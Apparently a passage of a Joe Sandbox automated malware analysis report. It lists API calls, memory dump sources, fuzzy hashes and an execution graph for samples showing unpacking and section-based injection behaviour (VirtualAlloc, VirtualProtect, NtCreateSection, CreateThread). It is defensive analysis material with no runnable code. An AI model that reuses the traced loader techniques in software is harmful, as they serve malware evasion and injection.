                            • Snapshot File: hcaresult_5_2_6d0000_ashcvvs.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction ID: d737391412cb78383b34bd059ac362a3996041c191b4104b2eff9d787dbb4a53
                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction Fuzzy Hash: C7D0123154512877D7102A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 328 423467-423484 VirtualProtect
                            APIs
                            • VirtualProtect.KERNELBASE(00000040,?,?,?,00423A9B), ref: 0042347D
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
                            • Instruction ID: cd11079ae9fe1b66df236ae7ddbd13e2ea7dadf25881c3163ba94d66086d63c1
                            • Opcode Fuzzy Hash: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
                            • Instruction Fuzzy Hash: 5CC08CB1140109FFCF018B81EC06E593BADE300308F001131B701A1070C271AA21AB1D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 329 40192a-40195e call 401196 Sleep call 40141a 338 401960-401968 call 401513 329->338 339 40196d-4019b8 call 401196 329->339 338->339
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                            • Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
                            • Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                            • Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 353 4018fa-40195e call 401196 Sleep call 40141a 367 401960-401968 call 401513 353->367 368 40196d-4019b8 call 401196 353->368 367->368
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                            • Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
                            • Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                            • Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 401906-40195e call 401196 Sleep call 40141a 394 401960-401968 call 401513 382->394 395 40196d-4019b8 call 401196 382->395 394->395
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                            • Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
                            • Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                            • Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 409 401937-40193b 410 401925-401939 409->410 411 40193c-40195e call 401196 Sleep call 40141a 409->411 410->411 420 401960-401968 call 401513 411->420 421 40196d-4019b8 call 401196 411->421 420->421
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                            • Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
                            • Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                            • Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 435 401926-40195e call 401196 Sleep call 40141a 446 401960-401968 call 401513 435->446 447 40196d-4019b8 call 401196 435->447 446->447
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                            • Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
                            • Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                            • Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006FC0F8
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F9000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_6f9000_ashcvvs.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction ID: 9e9c26a5fcbfe93d46a094477a199653925f0e2db0de5bb061c7412d1a183fdc
                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction Fuzzy Hash: 5E112B79A00208EFDB01DF98CA85E98BBF5AF08350F058095FA489B362D371EA50DF80
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                            • Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
                            • Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                            • Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F
                            APIs
                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,0042840C), ref: 004236AD
                            • OpenJobObjectA.KERNEL32(00000000,00000000,00428418), ref: 004236BA
                            • GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004236C9
                            • Sleep.KERNEL32(00000000), ref: 004236D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: CalendarInfoNameObjectOpenPathShortSleep
                            • String ID: -
                            • API String ID: 3454512315-2547889144
                            • Opcode ID: 51237ded8cffff5c661eebe9a307697b28ab80f9e6e32791c6b23dd8faaea119
                            • Instruction ID: deacb889439696245f735b3f4471453babfeec7347a63c5168fd63d97d027ef3
                            • Opcode Fuzzy Hash: 51237ded8cffff5c661eebe9a307697b28ab80f9e6e32791c6b23dd8faaea119
                            • Instruction Fuzzy Hash: 7921A771A00128EBC7319F15EC859AE7778EB85715F4080ADE659A7241C73C4A86CF6C
                            APIs
                            • GetModuleHandleW.KERNEL32(0043A3B0), ref: 00423551
                            • GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042358E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: $VirtualProtect
                            • API String ID: 1646373207-947944765
                            • Opcode ID: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction ID: d0582955cadd0fc5f4b94350803a6a31df697eece703d4cb31990996f5db6057
                            • Opcode Fuzzy Hash: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction Fuzzy Hash: 8E31531569C3C0D8E331CBA8BC857297B62AB15B14F54347AD9848B2F1D3FA056A836F
                            APIs
                            • GetFullPathNameW.KERNEL32(0042844C,00000000,?,00000000), ref: 00423744
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00423760
                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0042377E
                            • SetFileShortNameA.KERNEL32(00000000,00428480), ref: 0042378A
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
                            • String ID:
                            • API String ID: 4071102102-0
                            • Opcode ID: 741c1bccab81f8b294f72623694b2b6f52fb331087fe6a6da8c1225e30d228ee
                            • Instruction ID: 4f65d5ff727ea9b5f32b9490f161a63e31010cc474a4420f8d895bd29f22500d
                            • Opcode Fuzzy Hash: 741c1bccab81f8b294f72623694b2b6f52fb331087fe6a6da8c1225e30d228ee
                            • Instruction Fuzzy Hash: B101B1B1704124AFCB20AF69BC89D6B77BCE78971AB80503FF501D2150DA3C1945CB6E
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction ID: 79eb0d46623e3e840f5a8a74d676871430ce86260699b964cc8067b3add82cac
                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction Fuzzy Hash: 8A117232600159BBCF225E84EC01CEE3F62FB59754B998416FA1955130C63ACAB2AB89

                            Execution Graph

                            Execution Coverage:8.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:3.1%
                            Total number of Nodes:130
                            Total number of Limit Nodes:3
                            execution_graph 1260 7ff7dad8e3ff 1261 7ff7dad8e40f 1260->1261 1262 7ff7dad8e425 ExitProcess 1261->1262 1263 7ff7dad8e43c 1261->1263 1262->1263 1266 7ff7dad67de4 GetProcAddress 1263->1266 1267 7ff7dad67e10 1266->1267 1269 7ff7dad6806b 1266->1269 1268 7ff7dad68006 GetProcAddress 1267->1268 1267->1269 1268->1267 1268->1269 1370 7ff7dad61017 1371 7ff7dad61024 1370->1371 1372 7ff7dad61037 __set_app_type 1371->1372 1373 7ff7dad61043 1371->1373 1372->1373 1303 7ff7dad64ec0 1304 7ff7dad64ed8 1303->1304 1305 7ff7dad64c10 VirtualAlloc 1304->1305 1306 7ff7dad64ef9 1305->1306 1247 7ff7dad68920 1248 7ff7dad68956 1247->1248 1248->1248 1249 7ff7dad68bd3 1248->1249 1252 7ff7dad68bf7 1248->1252 1255 7ff7dad68cc0 1248->1255 1250 7ff7dad68210 VirtualAlloc 1249->1250 1251 7ff7dad68be0 1250->1251 1256 7ff7dad685ac 1251->1256 1252->1251 1253 7ff7dad68210 VirtualAlloc 1252->1253 1253->1251 1257 7ff7dad685cd 1256->1257 1258 7ff7dad6861d 1257->1258 1259 7ff7dad6846c VirtualAlloc 1257->1259 1258->1255 1259->1258 1216 7ff7dad611ad 1217 7ff7dad611d3 1216->1217 1218 7ff7dad611ed _initterm 1217->1218 1219 7ff7dad61213 1217->1219 1218->1219 1220 7ff7dad64d2d 1221 7ff7dad64d45 1220->1221 1226 7ff7dad64c10 VirtualAlloc 1221->1226 1223 7ff7dad64d54 1224 7ff7dad64d6a CreateThread 1223->1224 1225 7ff7dad64de0 1223->1225 1224->1225 1227 7ff7dad64c3c 1226->1227 1227->1223 1362 7ff7daf2dfcd 1363 7ff7daf2dff3 1362->1363 1364 7ff7dad67de4 2 API calls 1363->1364 1365 7ff7daf2e048 1364->1365 1366 7ff7dad67de4 2 API calls 1365->1366 1367 7ff7daf2e062 1366->1367 1307 7ff7daf2f771 1308 7ff7daf2f797 1307->1308 1309 7ff7dad67de4 2 API calls 1308->1309 1310 7ff7daf2f7ec 1309->1310 1311 7ff7dad67de4 2 API calls 1310->1311 1312 7ff7daf2f806 1311->1312 1313 7ff7dad67de4 2 API calls 1312->1313 1314 7ff7daf2f820 1313->1314 1315 7ff7dad67de4 2 API calls 1314->1315 1316 7ff7daf2f83a 1315->1316 1317 7ff7dad67de4 2 API calls 1316->1317 1318 7ff7daf2f854 1317->1318 1319 7ff7dad67de4 2 API calls 1318->1319 1320 7ff7daf2f86e 1319->1320 1321 7ff7dad67de4 2 API calls 1320->1321 1322 7ff7daf2f888 1321->1322 1323 7ff7dad67de4 2 API calls 1322->1323 1324 7ff7daf2f8a2 1323->1324 1325 7ff7dad67de4 2 API calls 1324->1325 1326 7ff7daf2f8bc 1325->1326 1327 7ff7dad67de4 2 API calls 1326->1327 1328 7ff7daf2f8d6 1327->1328 1329 7ff7dad67de4 2 API calls 1328->1329 1330 7ff7daf2f8f0 1329->1330 1331 7ff7dad67de4 2 API calls 1330->1331 1332 7ff7daf2f90a 1331->1332 1333 7ff7dad67de4 2 API calls 1332->1333 1334 7ff7daf2f924 1333->1334 1299 7ff7dad638f3 1300 7ff7dad63919 1299->1300 1301 7ff7dad67de4 2 API calls 1300->1301 1302 7ff7dad6396e 1301->1302 1274 7ff7dadf8f0c 1275 7ff7dadf8f1e 1274->1275 1276 7ff7dad67de4 2 API calls 1275->1276 1277 7ff7dadf8fa1 1276->1277 1278 7ff7dad67de4 2 API calls 1277->1278 1279 7ff7dadf8fc3 1278->1279 1280 7ff7dad67de4 2 API calls 1279->1280 1281 7ff7dadf8fe5 1280->1281 1282 7ff7dad67de4 2 API calls 1281->1282 1283 7ff7dadf9007 1282->1283 1284 7ff7dad67de4 2 API calls 1283->1284 1285 7ff7dadf9029 1284->1285 1286 7ff7dad67de4 2 API calls 1285->1286 1287 7ff7dadf904b 1286->1287 1288 7ff7dad67de4 2 API calls 1287->1288 1289 7ff7dadf906d 1288->1289 1290 7ff7dad67de4 2 API calls 1289->1290 1291 7ff7dadf908f 1290->1291 1335 7ff7dad64cd6 TlsSetValue 1336 7ff7dad64d00 1335->1336 1228 7ff7dad69114 1229 7ff7dad69119 1228->1229 1232 7ff7dad68f67 1229->1232 1235 7ff7dad68ebf 1232->1235 1236 7ff7dad68ee7 1235->1236 1237 7ff7dad68f05 1236->1237 1239 7ff7dad6846c 1236->1239 1240 7ff7dad6849e 1239->1240 1242 7ff7dad684b9 1240->1242 1243 7ff7dad68210 1240->1243 1242->1237 1244 7ff7dad682ee VirtualAlloc 1243->1244 1246 7ff7dad6842b 1243->1246 1244->1246 1246->1242 1337 7ff7dad67cd5 1338 7ff7dad67ce1 ExitProcess 1337->1338 1338->1338 1339 7ff7dad67dd6 1338->1339 1340 7ff7dad636b5 1341 7ff7dad636db 1340->1341 1342 7ff7dad67de4 2 API calls 1341->1342 1343 7ff7dad63730 1342->1343 1344 7ff7dad67de4 2 API calls 1343->1344 1345 7ff7dad6374a 1344->1345 1346 7ff7dad67de4 2 API calls 1345->1346 1347 7ff7dad63764 1346->1347 1348 7ff7dad67de4 2 API calls 1347->1348 1349 7ff7dad6377e 1348->1349 1350 7ff7dad67de4 2 API calls 1349->1350 1351 7ff7dad63798 1350->1351 1352 7ff7dad67de4 2 API calls 1351->1352 1353 7ff7dad637b2 1352->1353 1354 7ff7dad682b2 1355 7ff7dad682b9 1354->1355 1356 7ff7dad68324 VirtualAlloc 1354->1356 1355->1356 1357 7ff7dad6842b 1355->1357 1356->1357

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: (IkY
                            • API String ID: 4275171209-2939663806
                            • Opcode ID: 654375bd2adb7c4ce6cfcce837ff9cac6b0cc9778b80684c7d8a0c1e9c6bb85e
                            • Instruction ID: ceceb32fe45d391f18339da1ea83bae42b48b752a83a3a171afab2d853b24054
                            • Opcode Fuzzy Hash: 654375bd2adb7c4ce6cfcce837ff9cac6b0cc9778b80684c7d8a0c1e9c6bb85e
                            • Instruction Fuzzy Hash: 05412D22B3486103976C8579AC23E7A99D397D57A4B94E33EEA1BCBFE4D92CC4010B04

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 01481c68a23a2812913d17c9761d3a9cda6e291ecc39a4a3494c41bc91cfc42a
                            • Instruction ID: 5aec3049c65b882a7dbf2186382ce4ac530d964ca79f73d5a0a422fb71adc99a
                            • Opcode Fuzzy Hash: 01481c68a23a2812913d17c9761d3a9cda6e291ecc39a4a3494c41bc91cfc42a
                            • Instruction Fuzzy Hash: A2314C33B3486143E36CC639A822F7A9AD3D7A5794F98923EDA1AC7FD4C52CD0014B04

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: _initterm
                            • String ID:
                            • API String ID: 4163712557-0
                            • Opcode ID: 2c5eb427298b35530c371963756332f62d4f86dff1dd143fbbe62a8679ce9941
                            • Instruction ID: 99589a605b3d3a3c1e882080a79de0be6cab163f97762ca7e696ae7185d7d853
                            • Opcode Fuzzy Hash: 2c5eb427298b35530c371963756332f62d4f86dff1dd143fbbe62a8679ce9941
                            • Instruction Fuzzy Hash: B631A265E09B0A88FB40AB56E8847ADB3A1BB48B84FC044F7DD0C473A6DE7CE4418320

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AllocCreateThreadVirtual
                            • String ID:
                            • API String ID: 3065189322-0
                            • Opcode ID: f4da127b37b09146a3287b4c1fc7b5c66ded5ad9a82646e24f1534fe06c91efc
                            • Instruction ID: 3c0dcb3af1bc07d3e6b5ac337e3db34e12d80deac97b0036c527addb80761fd8
                            • Opcode Fuzzy Hash: f4da127b37b09146a3287b4c1fc7b5c66ded5ad9a82646e24f1534fe06c91efc
                            • Instruction Fuzzy Hash: 0B314776509F8981EB40AB15F44036EB3A4F789B84FE04176EA8D0376ACF7CD555C760

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 182e7078fdde7105ded17e1f2c3a8597fbe191e7521f7cc7b5a51861ea6cf64f
                            • Instruction ID: 4d6b210488d2a0494db8403cbcc60952b0d47dc6973e4294be9e1e50ef22a9af
                            • Opcode Fuzzy Hash: 182e7078fdde7105ded17e1f2c3a8597fbe191e7521f7cc7b5a51861ea6cf64f
                            • Instruction Fuzzy Hash: 490182A2729F8086EA60DB65B49411EABA1F7C9BE8F541234EF9E877D9CA3CD1404700
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AddressProc
                            • String ID: @
                            • API String ID: 190572456-2766056989
                            • Opcode ID: 98dab1cb01b021df85c4e2773f3ef182a83cdd50f2952866cd6c392297a248ff
                            • Instruction ID: c6ca9b9157182e4e4820a26641843ac100b084b8c98e365f39f93d06336abb42
